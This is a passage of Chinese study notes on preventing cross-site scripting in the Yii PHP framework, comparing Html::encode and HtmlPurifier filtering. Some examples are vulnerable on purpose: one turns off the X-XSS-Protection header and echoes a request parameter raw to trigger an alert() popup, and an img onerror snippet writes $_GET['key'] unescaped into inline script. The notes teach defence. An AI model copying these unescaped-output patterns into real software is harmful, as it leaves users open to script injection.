  该类中继承了 BaseHtml 类，因此也可以对字符串进行 HTML 实体编码。

  使用举例：

  ``` php
  \YII::$app -> response -> headers() -> add( 'X-XSS-Protection', '0' );
  // $script = '<script>alert(1024)</script>' ;
  $script = \YII::$app -> response -> get('script');
  echo $script ;
  echo \yii\helpers\Html::encode($script);
  ```

  可以发现第一次执行 echo 语句的时候浏览器弹窗了，而第二句 echo 语句执行的时候， 浏览器将 `$script` 字符串内容原样输出。

  > \yii\helpers 中的  `\` 代表的是 basic\vender\yiisoft\yii2。

-  过滤防范（过滤 URL 中的 JS 代码）

编码后的 JS 代码至少可以原样输出到浏览器，而过滤掉的 JS 代码却将直接被抛弃。

举例说明：只需把上面的 `Html::encode` 改为 `HtmlPurifier::process($script);`

- 词法解析器 Lexer

YII 中实现 JS 过滤，即 `HtmlPurifier::process()` 方法中就采用了 Lexer 技术。Lexer 解析器能够将指定字符串解析成 HTML / CSS / JS 代码。

- 为什么不用正则过滤？

JS 代码的表现形式在 URL 中过于灵活。可以使用嵌入在图片标签的 onerror() 事件中，也可以嵌入到其他 HTML 标签中监听的事件当中，也可以在超链接中使用 javascript 伪协议。所以采用 Lexer 技术，让浏览器决定哪段代码需要被过滤，然后采用 PHP 的方法进行过滤，这样过滤更干净。

## 其他

- GMT

格林威治时间 GMT 全球都采用的时间表达方式，而受时区影响。 GMT + 8h = 北京时间。

- htmlspecialchars() / htmlspecialchars_decode()
- 后台和前端的区别?  

前端是所有人都能访问，而且每个人看到的结果都是一样的，而后台只有相应权限的人才能看，每个用户看到的都不一样。

- 图片加载失败时报错

``` html
<img src='x' onerror='var a = "123<?=$_GET['key']?>"alert(1024);//'>
```

- 解决强依赖还有哪些思路?

依赖不要写在方法之中。 当依赖作为参数传递给方法时，该方法不能是构造函数和析构函数。

## 附录：常用命令

``` shell
net stop|start apache2.2
```

## 参考

- *[Yii PHP Framework: Best for Web 2.0 Development](http://www.Yiiframework.com/)*
- *[宽字节](http://www.2cto.com/Article/201301/186372.html)*
- *[百度脑图](http://naotu.baidu.com)*

